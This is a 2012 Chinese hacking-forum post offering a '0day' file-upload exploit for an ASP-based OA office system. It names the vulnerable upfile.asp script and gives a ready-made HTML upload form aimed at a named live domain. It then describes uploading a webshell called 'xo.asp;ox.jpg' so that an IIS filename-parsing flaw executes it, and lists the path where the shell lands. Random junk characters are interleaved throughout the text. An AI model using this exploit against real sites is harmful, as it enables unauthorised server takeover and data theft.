找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2164|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
全能OA办公系统 上传漏洞
* \- J1 E1 K3 L: p" v; {3 V. ]) {: X2 D2 @2 `; w
系统介绍:7 \" B# c: p% }8 X, |+ _  o4 Q$ {

; x2 a" v! ]' \# d3 ^) O全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
; F- n. ], |! A: [+ ]6 J2 V5 T5 \6 L8 e2 F& h' }$ l$ `0 E
主要功能:5 l4 v# x0 N& Y! f  Q' j* F  \
公司通告 0 l8 u5 V; a/ _6 r
工作计划 ) o5 m: f$ b! Q% f* @
通讯助理
2 s" |) u" v) V6 y1 R客户资源
% \# X0 W9 \8 C  L# k我的公文
. t, h- Y( N4 n' V# B: I公文传阅
8 q' B* X' U& {* x: b- j公共资源
  ]- r2 y& k- z7 D2 E5 p2 D* v% k( N资源预约
! ~- y" L; g2 g- E0 {  ^今日考勤 & j' M$ s9 T/ C5 h
个人计划
9 [2 h& j2 O* @- E个人通讯录 ) B( q; R% c# O" l1 i( W
个人基本档案 * H5 n# G% Y6 v" g1 S5 G4 \
未读邮件
  B. W% ^& |  C- a发邮件
3 z6 k+ n8 R0 F  l2 p收件夹
3 \0 A  K! q2 N2 J1 Z  ^寄件夹
) [9 q4 l. G0 M3 v  I网络硬盘 ( Z3 b/ T9 S3 t& z( _" f+ W
网络会议
! x: g! t5 b% A4 \, r' d网络调查
2 g8 f1 f$ W  s! E0 s; X交流论坛$ D* f) x' ?: r3 P# `

; ]/ p5 ]; T- F有兴趣测试的朋友可以下源码看看& c+ U, E  N6 `1 g

" C( e* F, o4 v/ j源码下载:
+ B/ W- J0 |' s% M; A6 H- n4 @9 X: T6 ~/ e  [
http://www.mycodes.net/30/4750.htm. h" k- Z* _7 c0 D: H$ z* F8 s
6 Q9 x* z% {1 n$ [6 b8 g5 `1 t+ u9 s
漏洞介绍:8 G9 \8 {# y$ l" y8 z. A0 R
8 k% i9 F6 [1 ]0 T4 ?, ^
由upfile.asp上传文件漏洞引起
. ~$ Y/ i1 L0 x- U
, Q9 |( b1 L+ K$ Z3 t: x$ p8 j2 J测试方法:
4 c5 B) Z8 M3 y* H
6 T' ?) n, j1 F# K6 l7 o使用名小子上传http://www.itlynn.com/upfile.asp即可
. _2 y, ~+ o. A; b% }8 m# \3 L1 J; }9 A; v
如果upfile.asp文件被删除不存在。5 ?+ V; y- E5 \- i% \% I8 {
$ L# X/ i  m/ e
  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp" u$ V- k* G! M( ?, q. {
  M' o6 N& j$ _  W: W* h
如果存在那么将如下代码保存为upfile.html。
  ?5 i! m" V4 L7 r; @0 O8 G( u  Z& D# D! n
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp
- W8 I. T& d# o2 `% l1 H' W( V; f
& v0 X5 f2 V9 E' d$ x $ L1 h' z" L1 v5 {# d( D# b
% Q& `' _  V+ G% S
01 <table border='0' align="center" cellpadding="5"> 0 V' F4 Z* E0 T; Q

4 f0 e5 S2 d7 j! T% Q. f; j02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
+ k: ^9 \& u8 d' j7 R; y/ @, Y8 ~- o) l6 r7 Q. n) B
03 <tr>
3 h) m: T( K& q, X7 ?  W4 j3 }/ I+ W7 O
04             <td>报错:</td> # X+ ~* M% n$ G* n: Q: i
8 m1 x1 @5 Y, N  ]) b
05             <td><input type='radio' name='errnumber' value='0'> 9 q* g5 d6 }1 w: w. l1 ]

7 H" Q6 k% k, q5 k2 J7 v; F, }06               自动更名
! ~+ v0 P; e& s7 R: J, c" _6 ?+ N! p8 T9 z. s
07               <input type='radio' name='errnumber' value='1' checked>
6 G2 I  j7 Y( J3 q
& F4 Q+ A. i# s4 K4 e& B$ P08               报错方式 , u9 f# [, ]7 I# H

6 v" r: d5 {& A# {( ~) x( L09               <input type='radio' name='errnumber' value='2'> 1 b" d% ]# E( ~8 W

  O6 L* S5 U% m* Z9 \1 [2 X10               直接覆盖</td>
2 q. S% z. ^+ P4 t# g9 u0 H7 X" x3 p5 N- q
11           </tr> + w) `5 y+ i3 {! \; S

' S+ j$ t5 i' _% j12           <tr> ( m, Q% x( G7 ?+ D
5 K9 {" m+ t. K+ s. v) \) c
13             <td>主题:</td> 1 R! N2 Y+ o) F( a5 v' u
5 G! g* y' v4 h$ b! ]& E- J
14             <td><input type='text' name='filename' size='30'></td> : |! h0 o' U2 Q6 c/ W  t
5 h2 Y5 z% ]7 C; G
15           </tr> : a5 z* V+ E: c" \+ I$ t$ N

$ B- ~8 k0 o9 p' ?( g5 j16           <tr>
) v  b( C9 ~( Y
+ u- I! n( ^: a. v* [17             <td>文件:</td> 2 m2 w3 Q7 W# D1 k4 X3 r: T

" C* T3 K4 H6 T" a  R( k18             <td><input type="file"name="fruit"size="30"></td> ; `  W/ `7 d6 f6 C

" V1 A9 c/ L7 _4 n/ G# X19           </tr>
. \+ ]$ o. P9 Z1 b  D+ K4 t" s% V. D0 x" `1 i
20           <tr>
0 e+ t/ ~/ i" m% f* g# h0 [2 w6 A. f0 }3 @& Y+ f6 L* o& t8 p. L+ e
21             <td valign='top'>简介:</td> ( F& O! V2 r% H* }5 W$ F8 [" F
( T0 P' @* \- Q* v/ [; G$ R
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
/ x  s* d  _% B* l0 Z+ t% w8 h3 [( f' F: Q2 ]
23           </tr> ( N  R& B$ O5 X# X( t8 w) _1 p. C
* M( }: K3 I$ S7 K7 k6 G- G
24   
& m0 a  ~6 W" A3 r9 ], c  h) X! S) e& T
25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> 2 f& j6 E, k& X9 j, @
  c& W) a/ P  E5 f2 Q5 W* c  y
26           </tr>
! L; K9 x! f5 s# n9 U( X, ^! ]
1 ]3 B6 F, P9 t1 G! H27         </form> 1 E: w9 y2 e4 M! {6 z

# G' U; m" z1 y/ |' h' ]* J- b4 {然后打开上传一个文件名为xo.asp;ox.jpg的文件。: f2 ]3 O, K" H" X( q
1 M* J, ?5 `& B" ?
, z/ A; r  ^7 ]2 L/ k/ d
0 s% e& T/ {: L' n7 M$ a0 t4 h
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg8 `1 c! O! {- x% H1 ^% h4 s
# c' x; q1 {: [% T
此漏洞需要配合解析漏洞利用。
4 m. C) j! n, U1 G+ X- P  z  }  p/ I9 v) d! h! `1 a2 g, M
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表